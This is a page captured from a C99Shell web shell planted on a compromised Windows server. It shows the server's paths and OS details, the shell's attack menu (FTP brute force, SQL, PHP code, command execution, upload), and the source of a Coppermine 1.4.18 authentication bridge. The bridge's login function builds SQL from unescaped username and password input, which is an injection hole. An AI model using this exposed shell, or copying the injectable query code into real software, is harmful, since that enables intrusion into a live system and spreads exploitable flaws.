!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

C:\AmbienteBogota\cpg1418\bridge\   drwxrwxrwx
Free 4.08 GB of 39.52 GB (10.32%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     coppermine.inc.php (17.39 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/*************************
  Coppermine Photo Gallery
  ************************
  Copyright (c) 2003-2008 Dev Team
  v1.1 originally written by Gregory DEMAR

  This program is free software; you can redistribute it and/or modify
  it under the terms of the GNU General Public License version 3
  as published by the Free Software Foundation.
  
  ********************************************
  Coppermine version: 1.4.18
  $HeadURL: https://coppermine.svn.sourceforge.net/svnroot/coppermine/trunk/cpg1.4.x/bridge/coppermine.inc.php $
  $Revision: 4381 $
  $Author: nibbler999 $
  $Date: 2008-04-13 19:06:08 +0200 (So, 13 Apr 2008) $
**********************************************/


if (!defined('IN_COPPERMINE')) die('Not in Coppermine...');

// Switch that allows overriding the bridge manager with hard-coded values
define('USE_BRIDGEMGR'1);

require_once 
'bridge/udb_base.inc.php';

class 
coppermine_udb extends core_udb {

        function 
coppermine_udb()
        {
                global 
$BRIDGE,$CONFIG;

                if (!
USE_BRIDGEMGR) {

                        
$this->boardurl 'http://localhost/coppermine';
                        include_once(
'../include/config.inc.php');

                } else {
                        
$this->boardurl $CONFIG['site_url'];
                        
$this->use_post_based_groups = @$BRIDGE['use_post_based_groups'];
                }

                
// A hash that's a little specific to the client's configuration
                
$this->client_id md5($_SERVER['HTTP_USER_AGENT'].$_SERVER['SERVER_PROTOCOL'].$CONFIG['site_url']);

                
$this->multigroups 1;

                
$this->group_overrride = !$this->use_post_based_groups;

                
// Database connection settings
                
$this->db = array(
                        
'name' => $CONFIG['dbname'],
                        
'host' => $CONFIG['dbserver'] ? $CONFIG['dbserver'] : 'localhost',
                        
'user' => $CONFIG['dbuser'],
                        
'password' => $CONFIG['dbpass'],
                        
'prefix' =>$CONFIG['TABLE_PREFIX']
                );

                
// Board table names
                
$this->table = array(
                        
'users' => 'users',
                        
'groups' => 'usergroups',
                        
'sessions' => 'sessions'
                
);

                
// Derived full table names
                
$this->usertable '`' $this->db['name'] . '`.' $this->db['prefix'] . $this->table['users'];
                
$this->groupstable =  '`' $this->db['name'] . '`.' $this->db['prefix'] . $this->table['groups'];
                
$this->sessionstable =  '`' $this->db['name'] . '`.' $this->db['prefix'] . $this->table['sessions'];

                
// Table field names
                
$this->field = array(
                        
'username' => 'user_name'// name of 'username' field in users table
                        
'user_id' => 'user_id'// name of 'id' field in users table
                        
'password' => 'user_password'// name of 'password' field in users table
                        
'email' => 'user_email'// name of 'email' field in users table
                        
'regdate' => 'UNIX_TIMESTAMP(user_regdate)'// name of 'registered' field in users table
                        
'lastvisit' => 'UNIX_TIMESTAMP(user_lastvisit)'// last time user logged in
                        
'active' => 'user_active'// is user account active?
                        
'location' => "''"// name of 'location' field in users table
                        
'website' => "''"// name of 'website' field in users table
                        
'usertbl_group_id' => 'user_group'// name of 'group id' field in users table
                        
'grouptbl_group_id' => 'group_id'// name of 'group id' field in groups table
                        
'grouptbl_group_name' => 'group_name' // name of 'group name' field in groups table
                
);

                
// Pages to redirect to
                
$this->page = array(
                        
'register' => 'register.php',
                        
'editusers' => 'usermgr.php',
                        
'edituserprofile' => 'profile.php'
                
);

                
// Group ids - admin and guest only.
                
$this->admingroups = array(1);
                
$this->guestgroup 3;

                
// Connect to db
                
$this->connect($CONFIG['LINK_ID']);
        }


        
// Login function
        
function login$username null$password null$remember false ) {
                global 
$CONFIG;

                
// Create the session_id from concat(cookievalue,client_id)
                
$session_id $this->session_id.$this->client_id;

                
// Check if encrypted passwords are enabled
                
if ($CONFIG['enable_encrypted_passwords']) {
                        
$encpassword md5($password);
                } else {
                        
$encpassword $password;
                }

                
// Check for user in users table
                
$sql =  "SELECT user_id, user_name, user_password FROM {$this->usertable} WHERE ";
                
$sql .= "user_name = '$username' AND BINARY user_password = '$encpassword' AND user_active = 'YES'";
                
$results cpg_db_query($sql);

                
// If exists update lastvisit value, session, and login
                
if (mysql_num_rows($results)) {

                        
// Update lastvisit value
                        
$sql =  "UPDATE {$this->usertable} SET user_lastvisit = NOW() ";
                        
$sql .= "WHERE user_name = '$username' AND BINARY user_password = '$encpassword' AND user_active = 'YES'";
                        
cpg_db_query($sql$this->link_id);
        
                        
$USER_DATA mysql_fetch_assoc($results);
                        
mysql_free_result($results);
        
                        
// If this is a 'remember me' login set the remember field to true
                        
if ($remember) {
                                
$remember_sql ",remember = '1' ";
                        } else {
                                
$remember_sql '';
                        }
        
                        
// Update guest session with user's information
                        
$sql  "update {$this->sessionstable} set ";
                        
$sql .= "user_id={$USER_DATA['user_id']} ";
                        
$sql .= $remember_sql;
                        
$sql .= "where session_id = '" md5($session_id) . "'";
                        
cpg_db_query($sql$this->link_id);

                        return 
$USER_DATA;
                } else {

                        return 
false;
                }
        }


        
// Logout function
        
function logout() {

                
// Revert authenticated session to a guest session
                
$session_id $this->session_id.$this->client_id;
                
$sql  "update {$this->sessionstable} set user_id = 0, remember=0 where session_id = '" md5($session_id) . "'";
                
cpg_db_query($sql$this->link_id);
        }
        
        function 
get_groups( &$user )
        {
            
$groups = array($user['group_id'] - 100);

            
$sql "SELECT user_group_list FROM {$this->usertable} AS u WHERE {$this->field['user_id']}='{$user['id']}' and user_group_list <> '';";

            
$result cpg_db_query($sql$this->link_id);

            if (
$row mysql_fetch_array($result)){
                
$groups array_merge($groupsexplode(','$row['user_group_list']));
            }
            
            
mysql_free_result($result);

            return 
$groups;
        }
        
        
// definition of actions required to convert a password from user database form to cookie form
        
function udb_hash_db($password)
        {
                return 
$password;
        }


        
// definition of how to extract id, name, group from a session cookie
        
function session_extraction()
        {
            global 
$CONFIG;

                
// Default anonymous values
                
$id 0;
                
$pass '';

                
// Get the session cookie value
                
$sessioncookie $_COOKIE[$this->client_id];

                
// Create the session id by concat(session_cookie_value, client_id)
                
$session_id $sessioncookie.$this->client_id;

                
// Lifetime of 'remember me' session is 2 weeks
                
$rememberme_life_time time()-(CPG_WEEK*2);
        
                
// Lifetime of normal session is 1 hour
                
$session_life_time time()-CPG_HOUR;
        
                
// Delete old sessions
                
$sql "delete from {$this->sessionstable} where time<$session_life_time and remember=0;";
                
cpg_db_query($sql$this->link_id);
        
                
// Delete stale 'remember me' sessions
                
$sql "delete from {$this->sessionstable} where time<$rememberme_life_time;";
                
cpg_db_query($sql$this->link_id);
        
                
// Check for valid session if session_cookie_value exists
                
if ($sessioncookie) {
        
                    
// Check for valid session
                    
$sql =  'select user_id from '.$this->sessionstable." where session_id = '" md5($session_id) . "'";
                    
$result cpg_db_query($sql);
        
                    
// If session exists...
                    
if (mysql_num_rows($result)) {
                        
$row mysql_fetch_assoc($result);
                        
mysql_free_result($result);
        
                        
$row['user_id'] = (int) $row['user_id'];
        
                        
// Check if there's a user for this session
                        
$sql =  'select user_id as id, user_password as password ';
                        
$sql .= 'from '.$this->usertable.' ';
                        
$sql .= 'where user_id='.$row['user_id'];
                        
$result cpg_db_query($sql$this->link_id);
        
                        
// If user exists, use the current session
                        
if ($result) {
                            
$row mysql_fetch_assoc($result);
                            
mysql_free_result($result);
        
                            
$pass $row['password'];
                            
$id = (int) $row['id'];
                            
$this->session_id $sessioncookie;
        
                        
// If the user doesn't exist, use default guest credentials
                        
}
        
                    
// If not a valid session exists, create a new session
                    
} else {
        
                        
$this->create_session();
                    }
        
                
// No session exists; create one
                
} else {
        
                    
$this->create_session();
                }

                return (
$id) ? array($id$pass) : false;
        }


        
// Function used to keep the session alive
        
function session_update()
        {
                
$session_id $this->session_id.$this->client_id;
                
$sql "update {$this->sessionstable} set time='".time()."' where session_id = '" md5($session_id) . "'";
                
cpg_db_query($sql);
        }


        
// Create a new session with the cookie lifetime set to 2 weeks
        
function create_session() {
                global 
$CONFIG;
                
// start session
                
$this->session_id $this->generateId();
                
$session_id $this->session_id.$this->client_id;
        
                
$sql =  'insert into '.$this->sessionstable.' (session_id, user_id, time, remember) values ';
                
$sql .= '("'.md5($session_id).'", 0, "'.time().'", 0);';
        
                
// insert the guest session
                
cpg_db_query($sql$this->link_id);
        
                
// set the session cookie
                
setcookie$this->client_id$this->session_idtime() + (CPG_WEEK*2), $CONFIG['cookie_path'] );
        }


        
// Modified function taken from Mambo session class
        
function generateId() {
                
$failsafe 20;
                
$randnum 0;
                while (
$failsafe--) {
                        
$randnum md5uniqidmicrotime(), ));
                        
$session_id $randnum.$this->client_id;
                        if (
$randnum != "") {
                                
$sql "SELECT session_id FROM {$this->sessionstable} WHERE session_id = '" md5($session_id) . "'";
                                
$result cpg_db_query($sql$this->link_id);
                                if (!
mysql_num_rows($result)) {
                                        break;
                                }
                                
mysql_free_result($result);
                        }
                }
                return 
$randnum;
        }


        
// Gets user/guest count
        
function get_session_users() {
                static 
$count = array();
    
                if (!
$count) {
                        
// Get guest count
                        
$sql "select count(user_id) as num_guests from {$this->sessionstable} where user_id=0;";
                        
$result cpg_db_query($sql$this->link_id);
                        
$count mysql_fetch_assoc($result);
            
                        
// Get authenticated user count
                        
$sql "select count(user_id) as num_users from {$this->sessionstable} where user_id>0;";
                        
$result cpg_db_query($sql$this->link_id);
                        
$count array_merge(mysql_fetch_assoc($result), $count);
                }

                return 
$count;
        }


        
/*
         * Overidden functions !!DO NOT REMOVE OR CPG WILL NOT WORK CORRECTLY!!
         */
        // definition of how to extract an id and password hash from a cookie
        
function cookie_extraction()
        {
                return 
false;
        }

        
// Register
        
function register_page()
        {        }

        
// Edit users
        
function edit_users()
        {        }

        
// View users
        
function view_users()
        {        }

        
// View user profile
        
function view_profile($uid)
        {        }

        
// Edit user profile
        
function edit_profile($uid)
        {        }

        function 
login_page()
        {        }

        function 
logout_page() {
            
$this->logout();
        }
        
/* Note : we don't want to overide this - the groups need to be resynced to coppermine default after un-integration
         * Rebuttal: without overriding and removing Coppermine group deletion (see below) its impossible to add new groups to a non-bridged install.
         */
        
        
function synchronize_groups()
        {
            global 
$CONFIG ;

            if (
$this->use_post_based_groups){
                if (
$this->group_overrride){
                    
$udb_groups $this->collect_groups();
                } else {
                    
$sql "SELECT * FROM {$this->groupstable} WHERE {$this->field['grouptbl_group_name']} <> ''";

                    
$result cpg_db_query($sql$this->link_id);

                    
$udb_groups = array();

                    while (
$row mysql_fetch_assoc($result))
                    {
                        
$udb_groups[$row[$this->field['grouptbl_group_id']]+100] = utf_ucfirst(utf_strtolower($row[$this->field['grouptbl_group_name']]));
                    }
                }
            } else {
                
$udb_groups = array(=>'Administrators'2=> 'Registered'3=>'Guests'4=> 'Banned');
            }

            
$result cpg_db_query("SELECT group_id, group_name FROM {$CONFIG['TABLE_USERGROUPS']} WHERE 1");

            while (
$row mysql_fetch_array($result)) {
                
$cpg_groups[$row['group_id']] = $row['group_name'];
            }

            
mysql_free_result($result);
            
/* Must be removed to allow new groups to be created in an unbridged install.
            // Scan Coppermine groups that need to be deleted
            foreach($cpg_groups as $c_group_id => $c_group_name) {
                if ((!isset($udb_groups[$c_group_id]))) {
                    cpg_db_query("DELETE FROM {$CONFIG['TABLE_USERGROUPS']} WHERE group_id = '" . $c_group_id . "' LIMIT 1");
                    unset($cpg_groups[$c_group_id]);
                }
            }
            */

            // Scan udb groups that need to be created inside Coppermine table
            
foreach($udb_groups as $i_group_id => $i_group_name) {
                if ((!isset(
$cpg_groups[$i_group_id]))) {
                    
// add admin info
                    
$admin_access in_array($i_group_id-100$this->admingroups) ? '1' '0';
                    
cpg_db_query("INSERT INTO {$CONFIG['TABLE_USERGROUPS']} (group_id, group_name, has_admin_access) VALUES ('$i_group_id', '" addslashes($i_group_name) . "', '$admin_access')");
                    
$cpg_groups[$i_group_id] = $i_group_name;
                }
            }

            
// Update Group names
            
foreach($udb_groups as $i_group_id => $i_group_name) {
                if (
$cpg_groups[$i_group_id] != $i_group_name) {
                    
cpg_db_query("UPDATE {$CONFIG['TABLE_USERGROUPS']} SET group_name = '" addslashes($i_group_name) . "' WHERE group_id = '$i_group_id' LIMIT 1");
                }
            }
            
// fix admin grp
            
if (!$this->use_post_based_groupscpg_db_query("UPDATE {$CONFIG['TABLE_USERGROUPS']} SET has_admin_access = '1' WHERE group_id = '1' LIMIT 1");

        }

}

// and go !
$cpg_udb = new coppermine_udb;
?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0468 ]--